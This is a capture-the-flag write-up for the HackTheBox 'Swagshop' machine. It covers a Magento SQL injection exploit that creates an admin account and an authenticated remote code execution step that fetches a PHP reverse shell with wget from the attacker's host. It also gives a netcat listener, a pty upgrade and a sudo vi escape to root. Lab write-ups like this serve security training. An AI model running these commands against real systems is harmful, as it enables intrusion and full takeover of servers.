OS: Ubuntu 16.04
Swagshop is an easy linux box on HackTheBox, which is running a vulnerable version of Magento. Using a python exploit, a sql injection creates an admin account. After creating the admin account a remote code execution python exploit allows for downloading a shell to the webroot. After triggering the reverse shell, loose restictions on sudo allow www-data to run vi on files in /var/www/html as root with no password. Escaping vi with a classic shell escape provides a shell as root.
Enumeration starts with a quick nmap scan. This reveals two open ports, 22 and 80.
command: nmap -sC -sV 10.10.10.140
Visiting port 80 a magento page is discovered.
Magento version enumeration is done by visting RELEASE_NOTES.txt
The first exploit used creates an admin user on the Magento Web Application through a sql injection.
command: searchsploit magento
Mirroring the exploit to the working directory.
command: searchsploit -m exploits/xml/webapps/37877.py
For the exploit to work, remove all uncommented text. We are required to add the target ip to the exploit. The path has to be altered, as it is incorrect.
Set the new admin username and password to anything you’d like. I chose the username and password newadmin:hacker
Running the modified exploit.
command python magentoexploit.py
Logging in as ‘newadmin to confirm that we have created a valid admin user.
Remote Code Execution Exploit
Finding an Authenticated Remote Code Execution Exploit.
Mirroring the exploit to current directory.
The exploit requires the exact date and time of the installation. This information can be found at /app/etc/local.xml
This exploit requires that username and password are defined. Change the install_date variable to reflect local.xml. Also the manual username control prevents the exploit from executing successfully.
Running the exploit. Executing whoami and pwd.
command python authenticatedrec.py http://10.10.10.140/index.php/admin/ “whoami” command python authenticatedrec.py http://10.10.10.140/index.php/admin/ “pwd”
Downloading a reverse shell to /var/www/html allows for executing the php when triggered through a web browser. Starting python simpleHTTPserver to serve the pentest monkey reverse shell. Don’t forget to change the IP and Port variable to reflect the attacker’s listener information.
command: python -m SimpleHTTPServer 80
Downloading the reverse shell with the exploits remote code execution.
command python authenticatedrec.py http://10.10.10.140/index.php/admin/ “wget http://10.10.14.20/revsh.php”
Starting a netcat listener:
command: nc -lvnp 443
Triggering the reverse shell.
Catching the reverse shell as user www-data
First things first, upgrade to a tty with python3. Python 2 is not on this system, but python3 is.
command: python3 -c “import pty; pty.spawn(‘/bin/bash’)”
It appears www-data can run /usr/bin/vi on any file in the /var/www/html directory as root without a password.
command: sudo -l
Running the following command will start vi as root. Using vi we can execute any bash command by prepending the command with ‘:!’.
command: sudo vi /var/www/html/anyfile
The shell escape sequence:
command: :! /bin/bash